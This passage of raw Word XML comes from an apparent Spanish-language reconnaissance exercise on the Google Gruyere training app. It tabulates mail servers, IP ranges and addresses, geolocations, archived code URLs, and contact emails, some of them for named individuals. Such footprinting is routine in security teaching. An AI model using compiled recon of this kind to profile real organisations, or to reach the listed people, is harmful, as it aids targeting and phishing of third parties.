              </w:tcPr>
              <w:p w14:paraId="3712F8DC" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="00CD1937" w:rsidRDefault="008C192F" w:rsidP="00CD1937">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00CD1937">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>alt2.gmr-smtp-in.l.google.com</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="2BA0B72C" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="00CD1937" w:rsidRDefault="008C192F" w:rsidP="00CD1937">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
              </w:p>
              <w:p w14:paraId="281C3A9A" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="00CD1937" w:rsidRDefault="008C192F" w:rsidP="00CD1937">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00CD1937">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>alt1.gmr-smtp-in.l.google.com</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="4C299375" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="00CD1937" w:rsidRDefault="008C192F" w:rsidP="00CD1937">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
              </w:p>
              <w:p w14:paraId="0EC14323" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="00CD1937" w:rsidRDefault="008C192F" w:rsidP="00CD1937">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00CD1937">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:lastRenderedPageBreak/>
                  <w:t>alt3.gmr-smtp-in.l.google.com</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="1CCBE1B6" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="00CD1937" w:rsidRDefault="008C192F" w:rsidP="00CD1937">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
              </w:p>
              <w:p w14:paraId="6B4A4869" w14:textId="12525FFE" w:rsidR="008C192F" w:rsidRPr="00CD1937" w:rsidRDefault="008C192F" w:rsidP="00CD1937">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00CD1937">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>alt4.gmr-smtp-in.l.google.com</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="7D394B64" w14:textId="1A0E3D68" w:rsidR="008C192F" w:rsidRPr="00CD1937" w:rsidRDefault="008C192F" w:rsidP="00CD1937">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
              </w:p>
              <w:p w14:paraId="4201EAA4" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="00CD1937" w:rsidRDefault="008C192F" w:rsidP="00CD1937">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00CD1937">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>gmr-smtp-in.l.google.com</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="2F567ED9" w14:textId="77777777" w:rsidR="008C192F" w:rsidRDefault="008C192F" w:rsidP="00CD1937">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                </w:pPr>
              </w:p>
              <w:p w14:paraId="28E4F2FD" w14:textId="5EE1F048" w:rsidR="008C192F" w:rsidRDefault="008C192F" w:rsidP="00CD1937">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                </w:pPr>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="1573" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="0F74361C" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="008C192F" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="008C192F">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:lastRenderedPageBreak/>
                  <w:t>1600 Amphitheatre Parkway, Mountain View, CA, 94043, US</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="792E12EA" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="008C192F" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="008C192F">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>142.250.0.0/15</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="2363C694" w14:textId="1569E945" w:rsidR="008C192F" w:rsidRPr="008C192F" w:rsidRDefault="008C192F" w:rsidP="009D1B6F">
                <w:pPr>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
              </w:p>
              <w:p w14:paraId="01E84E76" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="008C192F" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="008C192F">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:lastRenderedPageBreak/>
                  <w:t>1600 Amphitheatre Parkway, Mountain View, CA, 94043, US</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="71773A30" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="008C192F" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="008C192F">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>216.58.212.0/24</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="7E7AF612" w14:textId="723CF24A" w:rsidR="008C192F" w:rsidRPr="008C192F" w:rsidRDefault="008C192F" w:rsidP="009D1B6F">
                <w:pPr>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
              </w:p>
              <w:p w14:paraId="4B959ABE" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="008C192F" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="008C192F">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>1600 Amphitheatre Parkway, Mountain View, CA, 94043, US</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="6BB13305" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="008C192F" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="008C192F">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>216.58.192.0/19</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="656218EA" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="008C192F" w:rsidRDefault="008C192F" w:rsidP="009D1B6F">
                <w:pPr>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
              </w:p>
              <w:p w14:paraId="724A9386" w14:textId="0EC47FB4" w:rsidR="008C192F" w:rsidRPr="008C192F" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
              </w:p>
            </w:tc>
          </w:tr>
        </w:tbl>
        <w:p w14:paraId="129D0CDE" w14:textId="77777777" w:rsidR="003C6804" w:rsidRDefault="003C6804" w:rsidP="009D1B6F"/>
        <w:p w14:paraId="10F88B1B" w14:textId="77777777" w:rsidR="00EE0ECE" w:rsidRDefault="00EE0ECE" w:rsidP="00EE0ECE">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:tbl>
          <w:tblPr>
            <w:tblStyle w:val="Tablaconcuadrcula"/>
            <w:tblW w:w="0" w:type="auto"/>
            <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
          </w:tblPr>
          <w:tblGrid>
            <w:gridCol w:w="7058"/>
            <w:gridCol w:w="1417"/>
          </w:tblGrid>
          <w:tr w:rsidR="008C192F" w14:paraId="541956EF" w14:textId="77777777" w:rsidTr="008C192F">
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="6885" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="293A3BFA" w14:textId="2E7CF9CE" w:rsidR="008C192F" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:r w:rsidRPr="008C192F">
                  <w:rPr>
                    <w:color w:val="44546A" w:themeColor="text2"/>
                  </w:rPr>
                  <w:t>Ficheros históricos interesantes</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="1387" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="3A1BB5B2" w14:textId="1F4CABB7" w:rsidR="008C192F" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:r w:rsidRPr="008C192F">
                  <w:rPr>
                    <w:color w:val="44546A" w:themeColor="text2"/>
                  </w:rPr>
                  <w:t>Nombre de paises</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="008C192F" w14:paraId="36E02DC0" w14:textId="77777777" w:rsidTr="008C192F">
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="6885" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="6D88D08A" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="008C192F" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="008C192F">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>http://web.archive.org/web/20221129000624/https://google-gruyere.appspot.com/gruyere-code.zip</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="5CD96C3A" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="008C192F" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="008C192F">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>http://google-gruyere.appspot.com/gruyere-code.zip</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="6B28E2AB" w14:textId="4AE0EAE1" w:rsidR="008C192F" w:rsidRDefault="008C192F" w:rsidP="008C192F"/>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="1387" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="24B82BBD" w14:textId="34907638" w:rsidR="008C192F" w:rsidRPr="008C192F" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="008C192F">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>Sofia, Sofia-grad, Bulgaria, BG</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="251405A2" w14:textId="0C28CFAD" w:rsidR="008C192F" w:rsidRPr="008C192F" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
              </w:p>
              <w:p w14:paraId="0F94F4D8" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="008C192F" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="008C192F">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>Marseille, Provence-Alpes-Côte d'Azur, PAC, France, FR</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="14B3DFB1" w14:textId="73DB688B" w:rsidR="008C192F" w:rsidRPr="008C192F" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
              </w:p>
              <w:p w14:paraId="2E6A717E" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="008C192F" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="008C192F">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>Dublin, Leinster, L, Ireland, IE</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="434692E2" w14:textId="036F3D55" w:rsidR="008C192F" w:rsidRPr="008C192F" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
              </w:p>
              <w:p w14:paraId="5DAA5AF6" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="008C192F" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="008C192F">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>United States</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="5D908E1D" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="008C192F" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
              </w:p>
              <w:p w14:paraId="6A1E820E" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="008C192F" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
              </w:p>
              <w:p w14:paraId="1A8C9DC7" w14:textId="3B9BFBFA" w:rsidR="008C192F" w:rsidRPr="008C192F" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
              </w:p>
            </w:tc>
          </w:tr>
        </w:tbl>
        <w:p w14:paraId="10731942" w14:textId="77777777" w:rsidR="00613F8A" w:rsidRDefault="00613F8A" w:rsidP="008C192F"/>
        <w:p w14:paraId="5012CAA7" w14:textId="77777777" w:rsidR="0028393C" w:rsidRDefault="0028393C" w:rsidP="0028393C">
          <w:pPr>
            <w:pStyle w:val="Prrafodelista"/>
            <w:ind w:left="1428"/>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="3B99A42E" w14:textId="4B6D66FB" w:rsidR="00531973" w:rsidRDefault="00C60A8C" w:rsidP="00531973">
          <w:pPr>
            <w:ind w:left="708"/>
          </w:pPr>
          <w:r>
            <w:tab/>
          </w:r>
        </w:p>
        <w:p w14:paraId="40D9E811" w14:textId="676B9595" w:rsidR="000714B5" w:rsidRDefault="000714B5"/>
        <w:p w14:paraId="25566992" w14:textId="7F1CC3DA" w:rsidR="003077BC" w:rsidRDefault="003077BC"/>
        <w:p w14:paraId="0D927CC8" w14:textId="47C9BE6D" w:rsidR="003077BC" w:rsidRDefault="003077BC"/>
        <w:tbl>
          <w:tblPr>
            <w:tblStyle w:val="Tablaconcuadrcula"/>
            <w:tblW w:w="0" w:type="auto"/>
            <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
          </w:tblPr>
          <w:tblGrid>
            <w:gridCol w:w="4247"/>
            <w:gridCol w:w="4247"/>
          </w:tblGrid>
          <w:tr w:rsidR="008C192F" w14:paraId="50C08B5D" w14:textId="77777777" w:rsidTr="008C192F">
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4247" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="520296EA" w14:textId="6979E776" w:rsidR="008C192F" w:rsidRPr="00556339" w:rsidRDefault="008C192F">
                <w:pPr>
                  <w:rPr>
                    <w:color w:val="44546A" w:themeColor="text2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00556339">
                  <w:rPr>
                    <w:color w:val="44546A" w:themeColor="text2"/>
                  </w:rPr>
                  <w:t>Correos afiliados</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4247" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="486473F0" w14:textId="372FA211" w:rsidR="008C192F" w:rsidRPr="00556339" w:rsidRDefault="008C192F">
                <w:pPr>
                  <w:rPr>
                    <w:color w:val="44546A" w:themeColor="text2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00556339">
                  <w:rPr>
                    <w:color w:val="44546A" w:themeColor="text2"/>
                  </w:rPr>
                  <w:t>Direcciones IP afiliadas</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="008C192F" w14:paraId="7595FFDC" w14:textId="77777777" w:rsidTr="008C192F">
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4247" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="5A203D5F" w14:textId="0232A51B" w:rsidR="008C192F" w:rsidRDefault="00000000" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                </w:pPr>
                <w:hyperlink r:id="rId69" w:history="1">
                  <w:r w:rsidR="008C192F" w:rsidRPr="00AC20CB">
                    <w:rPr>
                      <w:rStyle w:val="Hipervnculo"/>
                    </w:rPr>
                    <w:t>arin-contact@google.com</w:t>
                  </w:r>
                </w:hyperlink>
              </w:p>
              <w:p w14:paraId="6419B479" w14:textId="77777777" w:rsidR="008C192F" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                </w:pPr>
              </w:p>
              <w:p w14:paraId="7F70EC79" w14:textId="1D131F46" w:rsidR="008C192F" w:rsidRDefault="00000000" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                </w:pPr>
                <w:hyperlink r:id="rId70" w:history="1">
                  <w:r w:rsidR="008C192F" w:rsidRPr="00AC20CB">
                    <w:rPr>
                      <w:rStyle w:val="Hipervnculo"/>
                    </w:rPr>
                    <w:t>dave.soper@appliedsystems.com</w:t>
                  </w:r>
                </w:hyperlink>
              </w:p>
              <w:p w14:paraId="2266F15D" w14:textId="01A376D5" w:rsidR="008C192F" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                </w:pPr>
              </w:p>
              <w:p w14:paraId="753EF4DF" w14:textId="7B68BDF8" w:rsidR="008C192F" w:rsidRDefault="00000000" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                </w:pPr>
                <w:hyperlink r:id="rId71" w:history="1">
                  <w:r w:rsidR="008C192F" w:rsidRPr="00AC20CB">
                    <w:rPr>
                      <w:rStyle w:val="Hipervnculo"/>
                    </w:rPr>
                    <w:t>eknowles@appliedsystems.com</w:t>
                  </w:r>
                </w:hyperlink>
              </w:p>
              <w:p w14:paraId="4290FE90" w14:textId="7C4CD7CA" w:rsidR="008C192F" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                </w:pPr>
              </w:p>
              <w:p w14:paraId="11FA102C" w14:textId="4FD0C8CD" w:rsidR="008C192F" w:rsidRDefault="00000000" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                </w:pPr>
                <w:hyperlink r:id="rId72" w:history="1">
                  <w:r w:rsidR="008C192F" w:rsidRPr="00AC20CB">
                    <w:rPr>
                      <w:rStyle w:val="Hipervnculo"/>
                    </w:rPr>
                    <w:t>jknecht@appliedsystems.com</w:t>
                  </w:r>
                </w:hyperlink>
              </w:p>
              <w:p w14:paraId="28EEB45F" w14:textId="17B452E4" w:rsidR="008C192F" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                </w:pPr>
              </w:p>
              <w:p w14:paraId="4B1A0B39" w14:textId="53D00028" w:rsidR="008C192F" w:rsidRDefault="00000000" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                </w:pPr>
                <w:hyperlink r:id="rId73" w:history="1">
                  <w:r w:rsidR="008C192F" w:rsidRPr="00AC20CB">
                    <w:rPr>
                      <w:rStyle w:val="Hipervnculo"/>
                    </w:rPr>
                    <w:t>network-abuse@google.com</w:t>
                  </w:r>
                </w:hyperlink>
              </w:p>
              <w:p w14:paraId="677D07A8" w14:textId="6DA2D4C5" w:rsidR="008C192F" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                </w:pPr>
              </w:p>
              <w:p w14:paraId="66CA6A2E" w14:textId="2E70366D" w:rsidR="008C192F" w:rsidRDefault="00000000" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                </w:pPr>
                <w:hyperlink r:id="rId74" w:history="1">
                  <w:r w:rsidR="008C192F" w:rsidRPr="00AC20CB">
                    <w:rPr>
                      <w:rStyle w:val="Hipervnculo"/>
                    </w:rPr>
                    <w:t>nwadmin@appliedsystems.com</w:t>
                  </w:r>
                </w:hyperlink>
              </w:p>
              <w:p w14:paraId="0FFB88F1" w14:textId="77777777" w:rsidR="008C192F" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                </w:pPr>
              </w:p>
              <w:p w14:paraId="6A698BFF" w14:textId="77777777" w:rsidR="008C192F" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                </w:pPr>
              </w:p>
              <w:p w14:paraId="3E3EAF28" w14:textId="77777777" w:rsidR="008C192F" w:rsidRDefault="008C192F"/>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4247" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="3E25DCDF" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="00556339" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00556339">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>142.250.150.14</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="168DF43A" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="00556339" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00556339">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>142.250.153.14</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="12C6F542" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="00556339" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00556339">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>142.250.201.16</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="58CB16F2" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="00556339" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00556339">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>142.250.201.17</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="562E0B82" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="00556339" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00556339">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>142.250.201.18</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="13E8D9E8" w14:textId="77777777" w:rsidR="008C192F" w:rsidRPr="00556339" w:rsidRDefault="008C192F" w:rsidP="008C192F">
                <w:pPr>
                  <w:pStyle w:val="HTMLconformatoprevio"/>
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                </w:pPr>
                <w:r w:rsidRPr="00556339">
                  <w:rPr>
                    <w:color w:val="ED7D31" w:themeColor="accent2"/>
                  </w:rPr>
                  <w:t>142.250.201.19</w:t>
                </w:r>
              </w:p>
